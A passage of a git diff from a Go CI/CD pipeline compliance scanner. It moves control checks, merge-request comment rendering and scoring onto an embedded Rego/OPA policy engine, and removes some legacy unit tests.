- t.Fatalf("expected 2 security jobs, got %d", result.Metrics.SecurityJobsFound)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].JobName != "gemnasium-dependency_scanning" {
- t.Fatalf("expected job gemnasium-dependency_scanning, got %s", result.Issues[0].JobName)
- }
-}
-
-func TestSecurityJobsWeakened_RulesCheckUsesJobHardcodedContent(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"secret_detection"},
- AllowFailureCheck: false,
- RulesCheck: true,
- WhenManualCheck: false,
- }
-
- mergedJobs := map[string]interface{}{
- "secret_detection": map[interface{}]interface{}{
- "script": "/analyzer run",
- },
- }
- // Raw conf does NOT have the job, but JobHardcodedContent does
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
- data.JobHardcodedContent["secret_detection"] = map[interface{}]interface{}{
- "rules": []interface{}{
- map[interface{}]interface{}{
- "when": "never",
- },
- },
- }
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
-}
-
-func TestIsAllowFailureTrue(t *testing.T) {
- tests := []struct {
- name string
- input interface{}
- want bool
- }{
- {"nil", nil, false},
- {"bool true", true, false}, // direct bool in test context
- {"bool false", false, false}, // not flagged
- {"string true", "true", true},
- {"string false", "false", false},
- {"map with exit_codes", map[interface{}]interface{}{"exit_codes": []int{1}}, true},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- got := isAllowFailureTrue(tt.input)
- // For the "bool true" case, the function should return true
- if tt.name == "bool true" {
- if !got {
- t.Fatalf("isAllowFailureTrue(true) = false, want true")
- }
- return
- }
- if got != tt.want {
- t.Fatalf("isAllowFailureTrue(%v) = %v, want %v", tt.input, got, tt.want)
- }
- })
- }
-}
-
-func TestIsWhenManual(t *testing.T) {
- tests := []struct {
- input interface{}
- want bool
- }{
- {nil, false},
- {"manual", true},
- {"Manual", true},
- {" manual ", true},
- {"on_success", false},
- {"always", false},
- {42, false},
- }
-
- for _, tt := range tests {
- got := isWhenManual(tt.input)
- if got != tt.want {
- t.Fatalf("isWhenManual(%v) = %v, want %v", tt.input, got, tt.want)
- }
- }
-}
-
-func TestMatchesAnyPattern(t *testing.T) {
- tests := []struct {
- jobName string
- patterns []string
- want bool
- }{
- {"semgrep-sast", []string{"*-sast"}, true},
- {"bandit-sast", []string{"*-sast"}, true},
- {"secret_detection", []string{"secret_detection"}, true},
- {"container_scanning", []string{"container_scanning"}, true},
- {"gemnasium-dependency_scanning", []string{"gemnasium-*"}, true},
- {"dast_api", []string{"dast_*"}, true},
- {"build", []string{"*-sast", "secret_detection"}, false},
- {"my-sast-job", []string{"*-sast"}, false},
- }
-
- for _, tt := range tests {
- t.Run(tt.jobName, func(t *testing.T) {
- got := matchesAnyPattern(tt.jobName, tt.patterns)
- if got != tt.want {
- t.Fatalf("matchesAnyPattern(%q, %v) = %v, want %v", tt.jobName, tt.patterns, got, tt.want)
- }
- })
- }
-}
diff --git a/control/mrcomment.go b/control/mrcomment.go
index 4d8eeab..9aeba3b 100644
--- a/control/mrcomment.go
+++ b/control/mrcomment.go
@@ -22,6 +22,7 @@ func ManageMergeRequestComment(
projectID int,
mrIID int,
result *AnalysisResult,
+ pc *configuration.PlumberConfig,
compliance float64,
threshold float64,
conf *configuration.Configuration,
@@ -36,7 +37,7 @@ func ManageMergeRequestComment(
})
// Generate comment body
- commentBody := generateMRComment(result, compliance, threshold, score, scoreMode, scorePointMode)
+ commentBody := generateMRComment(result, pc, compliance, threshold, score, scoreMode, scorePointMode)
// List existing notes to find our comment
notes, err := gitlab.ListMergeRequestNotes(
@@ -129,7 +130,7 @@ func ScoreBadgeURL(letter string) string {
// generateMRComment builds the Markdown body for the merge request comment
// based on the analysis result.
-func generateMRComment(result *AnalysisResult, compliance, threshold float64, score *PlumberScoreResult, scoreMode, scorePointMode bool) string {
+func generateMRComment(result *AnalysisResult, pc *configuration.PlumberConfig, compliance, threshold float64, score *PlumberScoreResult, scoreMode, scorePointMode bool) string {
var b strings.Builder
// Hidden identifier so we can find this comment later
@@ -164,7 +165,10 @@ func generateMRComment(result *AnalysisResult, compliance, threshold float64, sc
fmt.Fprintf(&b, "- **Score:** **%s**\n\n", score.Score)
}
- // Gather controls
+ // Gather controls from the config-driven catalog joined with the
+ // Rego Findings list. Compliance is binary per control (100% when
+ // no finding matches, 0% otherwise); skipped status comes from
+ // .plumber.yaml.
type controlEntry struct {
name string
compliance float64
@@ -172,97 +176,19 @@ func generateMRComment(result *AnalysisResult, compliance, threshold float64, sc
skipped bool
}
+ findingsByControl := FindingsByControl(result.Findings)
var controls []controlEntry
var totalIssues int
- if r := result.ImageForbiddenTagsResult; r != nil {
- name := "Container images must not use forbidden tags"
- if r.MustBePinnedByDigest {
- name = "Container images must be pinned by digest"
+ for _, e := range GitLabControls(pc) {
+ count := len(findingsByControl[e.ControlName])
+ ctrlCompliance := 100.0
+ if !e.Skipped && count > 0 {
+ ctrlCompliance = 0.0
}
- controls = append(controls, controlEntry{name, r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.ImageAuthorizedSourcesResult; r != nil {
- controls = append(controls, controlEntry{"Container images must come from authorized sources", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.BranchProtectionResult; r != nil {
- controls = append(controls, controlEntry{"Branch must be protected", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.HardcodedJobsResult; r != nil {
- controls = append(controls, controlEntry{"Pipeline must not include hardcoded jobs", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.OutdatedIncludesResult; r != nil {
- controls = append(controls, controlEntry{"Includes must be up to date", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.ForbiddenVersionsIncludesResult; r != nil {
- controls = append(controls, controlEntry{"Includes must not use forbidden versions", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.RequiredComponentsResult; r != nil {
- issueCount := len(r.Issues) + len(r.OverriddenIssues)
- controls = append(controls, controlEntry{"Pipeline must include required components", r.Compliance, issueCount, r.Skipped})
- if !r.Skipped {
- totalIssues += issueCount
- }
- }
- if r := result.RequiredTemplatesResult; r != nil {
- issueCount := len(r.Issues) + len(r.OverriddenIssues)
- controls = append(controls, controlEntry{"Pipeline must include required templates", r.Compliance, issueCount, r.Skipped})
- if !r.Skipped {
- totalIssues += issueCount
- }
- }
- if r := result.DebugTraceResult; r != nil {
- controls = append(controls, controlEntry{"Pipeline must not enable debug trace", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.VariableInjectionResult; r != nil {
- controls = append(controls, controlEntry{"Pipeline must not use unsafe variable expansion", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.SecurityJobsWeakenedResult; r != nil {
- controls = append(controls, controlEntry{"Security jobs must not be weakened", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.UnverifiedScriptsResult; r != nil {
- controls = append(controls, controlEntry{"Pipeline must not execute unverified scripts", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.JobVariablesOverrideResult; r != nil {
- controls = append(controls, controlEntry{"Pipeline must not override job variables", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
- }
- }
- if r := result.DockerInDockerResult; r != nil {
- controls = append(controls, controlEntry{"Pipeline must not use Docker-in-Docker", r.Compliance, len(r.Issues), r.Skipped})
- if !r.Skipped {
- totalIssues += len(r.Issues)
+ controls = append(controls, controlEntry{e.DisplayName, ctrlCompliance, count, e.Skipped})
+ if !e.Skipped {
+ totalIssues += count
}
}
@@ -304,175 +230,50 @@ func generateMRComment(result *AnalysisResult, compliance, threshold float64, sc
}
// writeIssueDetails appends per-control issue details into the builder.
+// Findings are grouped by the ControlName declared in the issue-code
+// registry so the section headings line up with the controls table.
+// Order within each group follows the Rego evaluation order so repeated
+// runs produce stable output.
func writeIssueDetails(b *strings.Builder, result *AnalysisResult) {
- // Forbidden tags / digest pinning
- if r := result.ImageForbiddenTagsResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- if r.MustBePinnedByDigest {
- b.WriteString("**Container images (digest pinning and forbidden tags):**\n")
- } else {
- b.WriteString("**Container images must not use forbidden tags:**\n")
- }
- for _, issue := range r.Issues {
- switch issue.Code {
- case CodeImageNotPinnedByDigest:
- fmt.Fprintf(b, "- `%s` Job `%s`: image `%s` is not pinned by digest ([docs](%s))\n", issue.Code, issue.Job, issue.Link, issue.DocURL)
- case CodeImageForbiddenTag:
- fmt.Fprintf(b, "- `%s` Job `%s`: image `%s` uses forbidden tag `%s` ([docs](%s))\n", issue.Code, issue.Job, issue.Link, issue.Tag, issue.DocURL)
- default:
- fmt.Fprintf(b, "- `%s` Job `%s`: image `%s` ([docs](%s))\n", issue.Code, issue.Job, issue.Link, issue.DocURL)
- }
- }
- b.WriteString("\n")
- }
-
- // Unauthorized images
- if r := result.ImageAuthorizedSourcesResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Container images must come from authorized sources:**\n")
- for _, issue := range r.Issues {
- fmt.Fprintf(b, "- `%s` Job `%s`: unauthorized image `%s` ([docs](%s))\n", issue.Code, issue.Job, issue.Link, issue.DocURL)
- }
- b.WriteString("\n")
- }
-
- // Branch protection
- if r := result.BranchProtectionResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Branch must be protected:**\n")
- for _, issue := range r.Issues {
- if issue.Type == "unprotected" {
- fmt.Fprintf(b, "- `%s` Branch `%s` is not protected ([docs](%s))\n", issue.Code, issue.BranchName, issue.DocURL)
- } else {
- fmt.Fprintf(b, "- `%s` Branch `%s` has non-compliant protection settings ([docs](%s))\n", issue.Code, issue.BranchName, issue.DocURL)
- }
- }
- b.WriteString("\n")
- }
-
- // Hardcoded jobs
- if r := result.HardcodedJobsResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Pipeline must not include hardcoded jobs:**\n")
- for _, issue := range r.Issues {
- fmt.Fprintf(b, "- `%s` Job `%s` is hardcoded (not from include/component) ([docs](%s))\n", issue.Code, issue.JobName, issue.DocURL)
- }
- b.WriteString("\n")
- }
-
- // Outdated includes
- if r := result.OutdatedIncludesResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Includes must be up to date:**\n")
- for _, issue := range r.Issues {
- fmt.Fprintf(b, "- `%s` `%s` uses version `%s` (latest: `%s`) ([docs](%s))\n", issue.Code, issue.GitlabIncludeLocation, issue.Version, issue.LatestVersion, issue.DocURL)
- }
- b.WriteString("\n")
- }
-
- // Forbidden versions
- if r := result.ForbiddenVersionsIncludesResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Includes must not use forbidden versions:**\n")
- for _, issue := range r.Issues {
- fmt.Fprintf(b, "- `%s` `%s` uses forbidden version `%s` ([docs](%s))\n", issue.Code, issue.GitlabIncludeLocation, issue.Version, issue.DocURL)
- }
- b.WriteString("\n")
- }
-
- // Required components
- if r := result.RequiredComponentsResult; r != nil && !r.Skipped && (len(r.Issues) > 0 || len(r.OverriddenIssues) > 0) {
- b.WriteString("**Pipeline must include required components:**\n")
- for _, issue := range r.Issues {
- fmt.Fprintf(b, "- `%s` Missing component `%s` (group %d) ([docs](%s))\n", issue.Code, issue.ComponentPath, issue.GroupIndex+1, issue.DocURL)
- }
- for _, issue := range r.OverriddenIssues {
- fmt.Fprintf(b, "- `%s` Overridden component `%s` (group %d) ([docs](%s))\n", issue.Code, issue.ComponentPath, issue.GroupIndex+1, issue.DocURL)
- for _, job := range issue.OverriddenJobs {
- fmt.Fprintf(b, " - job `%s` overrides: `%s`\n", job.JobName, strings.Join(job.OverriddenKeys, "`, `"))
- }
- }
- b.WriteString("\n")
- }
-
- // Required templates
- if r := result.RequiredTemplatesResult; r != nil && !r.Skipped && (len(r.Issues) > 0 || len(r.OverriddenIssues) > 0) {
- b.WriteString("**Pipeline must include required templates:**\n")
- for _, issue := range r.Issues {
- fmt.Fprintf(b, "- `%s` Missing template `%s` (group %d) ([docs](%s))\n", issue.Code, issue.TemplatePath, issue.GroupIndex+1, issue.DocURL)
- }
- for _, issue := range r.OverriddenIssues {
- fmt.Fprintf(b, "- `%s` Overridden template `%s` (group %d) ([docs](%s))\n", issue.Code, issue.TemplatePath, issue.GroupIndex+1, issue.DocURL)
- for _, job := range issue.OverriddenJobs {
- fmt.Fprintf(b, " - job `%s` overrides: `%s`\n", job.JobName, strings.Join(job.OverriddenKeys, "`, `"))
- }
- }
- b.WriteString("\n")
- }
-
- // Debug trace
- if r := result.DebugTraceResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Pipeline must not enable debug trace:**\n")
- for _, issue := range r.Issues {
- if issue.Location == "global" {
- fmt.Fprintf(b, "- `%s` `%s` = `%s` in global variables ([docs](%s))\n", issue.Code, issue.VariableName, issue.Value, issue.DocURL)
- } else {
- fmt.Fprintf(b, "- `%s` `%s` = `%s` in job `%s` ([docs](%s))\n", issue.Code, issue.VariableName, issue.Value, issue.Location, issue.DocURL)
- }
- }
- b.WriteString("\n")
- }
-
- // Variable injection
- if r := result.VariableInjectionResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Pipeline must not use unsafe variable expansion:**\n")
- for _, issue := range r.Issues {
- if issue.JobName == "(global)" {
- fmt.Fprintf(b, "- `$%s` used in global `%s`: `%s`\n", issue.VariableName, issue.ScriptBlock, issue.ScriptLine)
- } else {
- fmt.Fprintf(b, "- `$%s` used in job `%s` `%s`: `%s`\n", issue.VariableName, issue.JobName, issue.ScriptBlock, issue.ScriptLine)
- }
- }
- b.WriteString("\n")
- }
-
- // Security jobs weakened
- if r := result.SecurityJobsWeakenedResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Security jobs must not be weakened:**\n")
- for _, issue := range r.Issues {
- fmt.Fprintf(b, "- `%s` Job `%s`: %s ([docs](%s))\n", issue.Code, issue.JobName, issue.Detail, issue.DocURL)
- }
- b.WriteString("\n")
- }
-
- // Unverified script execution
- if r := result.UnverifiedScriptsResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Pipeline must not execute unverified scripts:**\n")
- for _, issue := range r.Issues {
- if issue.JobName == "(global)" {
- fmt.Fprintf(b, "- `%s` Global `%s`: `%s` ([docs](%s))\n", issue.Code, issue.ScriptBlock, issue.ScriptLine, issue.DocURL)
- } else {
- fmt.Fprintf(b, "- `%s` Job `%s` `%s`: `%s` ([docs](%s))\n", issue.Code, issue.JobName, issue.ScriptBlock, issue.ScriptLine, issue.DocURL)
- }
- }
- b.WriteString("\n")
- }
-
- // Docker-in-Docker
- if r := result.DockerInDockerResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Pipeline must not use Docker-in-Docker:**\n")
- for _, issue := range r.Issues {
- if issue.Code == CodeDockerInDockerUsage {
- fmt.Fprintf(b, "- `%s` Job `%s` uses DinD service: `%s` ([docs](%s))\n", issue.Code, issue.JobName, issue.ServiceImage, issue.DocURL)
- } else {
- fmt.Fprintf(b, "- `%s` Job `%s`: %s ([docs](%s))\n", issue.Code, issue.JobName, issue.Detail, issue.DocURL)
- }
- }
- b.WriteString("\n")
- }
-
- // Job variable overrides
- if r := result.JobVariablesOverrideResult; r != nil && !r.Skipped && len(r.Issues) > 0 {
- b.WriteString("**Pipeline must not override job variables:**\n")
- for _, issue := range r.Issues {
- if issue.Location == "global" {
- fmt.Fprintf(b, "- `%s` `%s` = `%s` in global variables ([docs](%s))\n", issue.Code, issue.VariableName, issue.Value, issue.DocURL)
+ findingsByControl := FindingsByControl(result.Findings)
+ // Emit groups in the registry order (the same order used by the
+ // controls table above) so the two sections align visually.
+ order := []struct {
+ controlName string
+ heading string
+ }{
+ {"containerImageMustNotUseForbiddenTags", "Container images must not use forbidden tags"},
+ {"containerImageMustComeFromAuthorizedSources", "Container images must come from authorized sources"},
+ {"branchMustBeProtected", "Branch must be protected"},
+ {"pipelineMustNotIncludeHardcodedJobs", "Pipeline must not include hardcoded jobs"},
+ {"includesMustBeUpToDate", "Includes must be up to date"},
+ {"includesMustNotUseForbiddenVersions", "Includes must not use forbidden versions"},
+ {"pipelineMustIncludeComponent", "Pipeline must include required components"},
+ {"pipelineMustIncludeTemplate", "Pipeline must include required templates"},
+ {"pipelineMustNotEnableDebugTrace", "Pipeline must not enable debug trace"},
+ {"pipelineMustNotUseUnsafeVariableExpansion", "Pipeline must not use unsafe variable expansion"},
+ {"pipelineMustNotOverrideJobVariables", "Pipeline must not override job variables"},
+ {"securityJobsMustNotBeWeakened", "Security jobs must not be weakened"},
+ {"pipelineMustNotExecuteUnverifiedScripts", "Pipeline must not execute unverified scripts"},
+ {"pipelineMustNotUseDockerInDocker", "Pipeline must not use Docker-in-Docker"},
+ {"workflowMustNotInjectUserInputInScripts", "Workflow must not inject user input in scripts"},
+ {"workflowMustNotReEnableInsecureCommands", "Workflow must not re-enable insecure commands"},
+ {"checkoutMustNotPersistCredentials", "actions/checkout must not persist credentials"},
+ {"workflowMustNotUseDangerousTriggers", "Workflow must not use dangerous triggers"},
+ {"workflowMustNotGrantPermissionsWriteAll", "Workflow must not grant write-all permissions"},
+ }
+ for _, g := range order {
+ findings := findingsByControl[g.controlName]
+ if len(findings) == 0 {
+ continue
+ }
+ fmt.Fprintf(b, "**%s:**\n", g.heading)
+ for _, f := range findings {
+ docURL := ErrorCode(f.Code).DocURL()
+ if f.Job != "" {
+ fmt.Fprintf(b, "- `%s` %s ([docs](%s))\n", f.Code, f.Message, docURL)
} else {
- fmt.Fprintf(b, "- `%s` `%s` = `%s` in job `%s` ([docs](%s))\n", issue.Code, issue.VariableName, issue.Value, issue.Location, issue.DocURL)
+ fmt.Fprintf(b, "- `%s` %s ([docs](%s))\n", f.Code, f.Message, docURL)
}
}
b.WriteString("\n")
diff --git a/control/scoring.go b/control/scoring.go
index e4c4b4b..db04d26 100644
--- a/control/scoring.go
+++ b/control/scoring.go
@@ -3,6 +3,8 @@ package control
import (
"math"
"sort"
+
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
)
// PlumberScoreProfileID identifies the scoring rules version (see docs/scoring.md).
@@ -48,86 +50,19 @@ type PlumberScoreResult struct {
Losses []SeverityLoss `json:"losses"`
}
-// forEachIssueCode invokes fn for every issue code from enabled (non-skipped) controls.
+// forEachIssueCode invokes fn for every issue code emitted by the
+// Rego/OPA rule engine. The legacy Go controls still populate their
+// per-control *Result fields in AnalysisResult for JSON backwards
+// compatibility (Phase A.2 of the refactor), but scoring and
+// aggregation read from the Rego Findings list β the single source
+// of truth now that all 19 codes are ported. See
+// docs/REFACTOR_MULTI_PROVIDER.md Β§8 Phase A.
func forEachIssueCode(result *AnalysisResult, fn func(ErrorCode)) {
if result == nil {
return
}
- if r := result.ImageForbiddenTagsResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.ImageAuthorizedSourcesResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.BranchProtectionResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.HardcodedJobsResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.OutdatedIncludesResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.ForbiddenVersionsIncludesResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.RequiredComponentsResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- for _, issue := range r.OverriddenIssues {
- fn(issue.Code)
- }
- }
- if r := result.RequiredTemplatesResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- for _, issue := range r.OverriddenIssues {
- fn(issue.Code)
- }
- }
- if r := result.DebugTraceResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.VariableInjectionResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.SecurityJobsWeakenedResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.UnverifiedScriptsResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.JobVariablesOverrideResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
- }
- if r := result.DockerInDockerResult; r != nil && !r.Skipped {
- for _, issue := range r.Issues {
- fn(issue.Code)
- }
+ for _, f := range result.Findings {
+ fn(ErrorCode(f.Code))
}
}
@@ -286,6 +221,23 @@ func scoreLetterFromPoints(finalPoints float64) string {
}
}
+// FindingsByControl groups Rego findings by their declared ControlName
+// (from the issue-code registry). Findings whose code has no registry
+// entry land under the "" key so the caller can still surface them if
+// they want. The map values preserve the input order so downstream
+// tables read deterministically.
+func FindingsByControl(findings []opaengine.Finding) map[string][]opaengine.Finding {
+ out := map[string][]opaengine.Finding{}
+ for _, f := range findings {
+ control := ""
+ if info := LookupCode(ErrorCode(f.Code)); info != nil {
+ control = info.ControlName
+ }
+ out[control] = append(out[control], f)
+ }
+ return out
+}
+
// ScoreLetterMeaning returns a short human-readable description of what a
// letter score implies about the pipeline. It is used by CLI banners,
// merge request comments, and documentation so wording stays consistent.
diff --git a/control/task.go b/control/task.go
index 0a0fb21..8995292 100644
--- a/control/task.go
+++ b/control/task.go
@@ -1,6 +1,7 @@
package control
import (
+ "context"
"fmt"
"os"
"path/filepath"
@@ -8,26 +9,18 @@ import (
"github.com/getplumber/plumber/collector"
"github.com/getplumber/plumber/configuration"
"github.com/getplumber/plumber/gitlab"
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
+ "github.com/getplumber/plumber/internal/ir"
+ "github.com/getplumber/plumber/policies"
"github.com/sirupsen/logrus"
)
-const (
- // Control names match .plumber.yaml keys exactly.
- controlContainerImageMustNotUseForbiddenTags = "containerImageMustNotUseForbiddenTags"
- controlContainerImageMustComeFromAuthorizedSources = "containerImageMustComeFromAuthorizedSources"
- controlBranchMustBeProtected = "branchMustBeProtected"
- controlPipelineMustNotIncludeHardcodedJobs = "pipelineMustNotIncludeHardcodedJobs"
- controlIncludesMustBeUpToDate = "includesMustBeUpToDate"
- controlIncludesMustNotUseForbiddenVersions = "includesMustNotUseForbiddenVersions"
- controlPipelineMustIncludeComponent = "pipelineMustIncludeComponent"
- controlPipelineMustIncludeTemplate = "pipelineMustIncludeTemplate"
- controlPipelineMustNotEnableDebugTrace = "pipelineMustNotEnableDebugTrace"
- controlPipelineMustNotUseUnsafeVariableExpansion = "pipelineMustNotUseUnsafeVariableExpansion"
- controlSecurityJobsMustNotBeWeakened = "securityJobsMustNotBeWeakened"
- controlPipelineMustNotExecuteUnverifiedScripts = "pipelineMustNotExecuteUnverifiedScripts"
- controlPipelineMustNotOverrideJobVariables = "pipelineMustNotOverrideJobVariables"
- controlPipelineMustNotUseDockerInDocker = "pipelineMustNotUseDockerInDocker"
-)
+// controlBranchMustBeProtected is the sole .plumber.yaml control key
+// the task flow still references directly β to decide whether to fetch
+// branch-protection metadata from the GitLab API before invoking the
+// Rego engine. Every other control is config-driven end-to-end through
+// the catalog in catalog.go.
+const controlBranchMustBeProtected = "branchMustBeProtected"
// shouldRunControl applies --controls / --skip-controls filtering for a control.
// If --controls is set, only listed controls are eligible.
@@ -79,6 +72,196 @@ func clearProgressLine(conf *configuration.Configuration) {
// analysisStepCount is the total number of progress steps reported during analysis.
const analysisStepCount = 18
+// runRegoEngine invokes the experimental Rego/OPA rule engine on the
+// GitLab collector outputs and returns the aggregated findings. The
+// legacy Go controls always run and remain authoritative until parity
+// is reached (see phases 2+). On any failure the returned slice is nil
+// and the error is logged at Warn level so the overall analysis still
+// completes.
+func runRegoEngine(
+ l *logrus.Entry,
+ conf *configuration.Configuration,
+ project *gitlab.Project,
+ originData *collector.GitlabPipelineOriginData,
+ imageData *collector.GitlabPipelineImageData,
+ protectionData *collector.GitlabProtectionAnalysisData,
+) []opaengine.Finding {
+ pipeline := collector.ToNormalizedPipeline(
+ conf.ProjectPath,
+ project.DefaultBranch,
+ project.CiConfPath,
+ originData,
+ imageData,
+ protectionData,
+ )
+ return evaluatePolicies(l, conf.PlumberConfig, pipeline)
+}
+
+// evaluatePolicies loads the embedded Rego policies and evaluates them
+// against pipeline. Provider-agnostic: the caller is responsible for
+// building the IR from whatever data source it has.
+func evaluatePolicies(l *logrus.Entry, pc *configuration.PlumberConfig, pipeline *ir.NormalizedPipeline) []opaengine.Finding {
+ l.Info("Running Rego/OPA rule engine")
+ engine := opaengine.New()
+ if err := engine.LoadFromFS(policies.FS); err != nil {
+ l.WithError(err).Warn("Failed to load embedded Rego policies")
+ return nil
+ }
+ findings, err := engine.Evaluate(context.Background(), pipeline, buildEngineConfig(pc))
+ if err != nil {
+ l.WithError(err).Warn("Rego/OPA engine evaluation failed")
+ return nil
+ }
+ findings = FilterFindingsByEnabledControls(findings, pc)
+ l.WithField("findingCount", len(findings)).Info("Rego/OPA engine evaluation completed")
+ return findings
+}
+
+// buildEngineConfig projects the relevant bits of the user's .plumber.yaml
+// onto a Rego-friendly map. Policies read it as `input.config..`.
+// Only the sections consumed by already-ported policies are included;
+// additional entries land with each new policy.
+func buildEngineConfig(pc *configuration.PlumberConfig) map[string]any {
+ if pc == nil {
+ return nil
+ }
+ cfg := map[string]any{}
+
+ if c := pc.Controls.ContainerImageMustNotUseForbiddenTags; c != nil {
+ if len(c.Tags) > 0 {
+ cfg["imageMutableTag"] = map[string]any{
+ "forbiddenTags": c.Tags,
+ }
+ }
+ if c.IsPinnedByDigestRequired() {
+ cfg["containerImageMustNotUseForbiddenTags"] = map[string]any{
+ "mustBePinnedByDigest": true,
+ }
+ }
+ }
+
+ if c := pc.Controls.PipelineMustNotEnableDebugTrace; c != nil && len(c.ForbiddenVariables) > 0 {
+ cfg["debugTrace"] = map[string]any{
+ "forbiddenVariables": c.ForbiddenVariables,
+ }
+ }
+
+ if c := pc.Controls.PipelineMustNotOverrideJobVariables; c != nil && len(c.Variables) > 0 {
+ cfg["jobVariablesOverride"] = map[string]any{
+ "protectedVariables": c.Variables,
+ }
+ }
+
+ if c := pc.Controls.SecurityJobsMustNotBeWeakened; c != nil && len(c.SecurityJobPatterns) > 0 {
+ cfg["securityJobsWeakened"] = map[string]any{
+ "securityJobPatterns": c.SecurityJobPatterns,
+ "allowFailureMustBeFalse": c.AllowFailureMustBeFalse.IsEnabled(true),
+ "whenMustNotBeManual": c.WhenMustNotBeManual.IsEnabled(true),
+ "rulesMustNotBeRedefined": c.RulesMustNotBeRedefined.IsEnabled(true),
+ }
+ }
+
+ if c := pc.Controls.PipelineMustNotUseUnsafeVariableExpansion; c != nil && len(c.DangerousVariables) > 0 {
+ cfg["unsafeVariableExpansion"] = map[string]any{
+ "dangerousVariables": c.DangerousVariables,
+ "allowedPatterns": c.AllowedPatterns,
+ }
+ }
+
+ if c := pc.Controls.BranchMustBeProtected; c != nil {
+ entry := map[string]any{
+ "namePatterns": c.NamePatterns,
+ }
+ if c.DefaultMustBeProtected != nil {
+ entry["defaultMustBeProtected"] = *c.DefaultMustBeProtected
+ }
+ if c.AllowForcePush != nil {
+ entry["allowForcePush"] = *c.AllowForcePush
+ }
+ if c.CodeOwnerApprovalRequired != nil {
+ entry["codeOwnerApprovalRequired"] = *c.CodeOwnerApprovalRequired
+ }
+ if c.MinPushAccessLevel != nil {
+ entry["minPushAccessLevel"] = *c.MinPushAccessLevel
+ }
+ if c.MinMergeAccessLevel != nil {
+ entry["minMergeAccessLevel"] = *c.MinMergeAccessLevel
+ }
+ cfg["branchMustBeProtected"] = entry
+ }
+
+ if c := pc.Controls.IncludesMustNotUseForbiddenVersions; c != nil {
+ defaultForbidden := false
+ if c.DefaultBranchIsForbiddenVersion != nil {
+ defaultForbidden = *c.DefaultBranchIsForbiddenVersion
+ }
+ cfg["includesForbiddenVersions"] = map[string]any{
+ "forbiddenVersions": c.ForbiddenVersions,
+ "defaultBranchIsForbiddenVersion": defaultForbidden,
+ }
+ }
+
+ if c := pc.Controls.ContainerImageMustComeFromAuthorizedSources; c != nil {
+ trustOfficial := false
+ if c.TrustDockerHubOfficialImages != nil {
+ trustOfficial = *c.TrustDockerHubOfficialImages
+ }
+ cfg["imageAuthorizedSources"] = map[string]any{
+ "trustedUrls": c.TrustedUrls,
+ "trustDockerHubOfficial": trustOfficial,
+ }
+ }
+
+ if c := pc.Controls.PipelineMustNotExecuteUnverifiedScripts; c != nil && len(c.TrustedUrls) > 0 {
+ cfg["unverifiedScripts"] = map[string]any{
+ "trustedUrls": c.TrustedUrls,
+ }
+ }
+
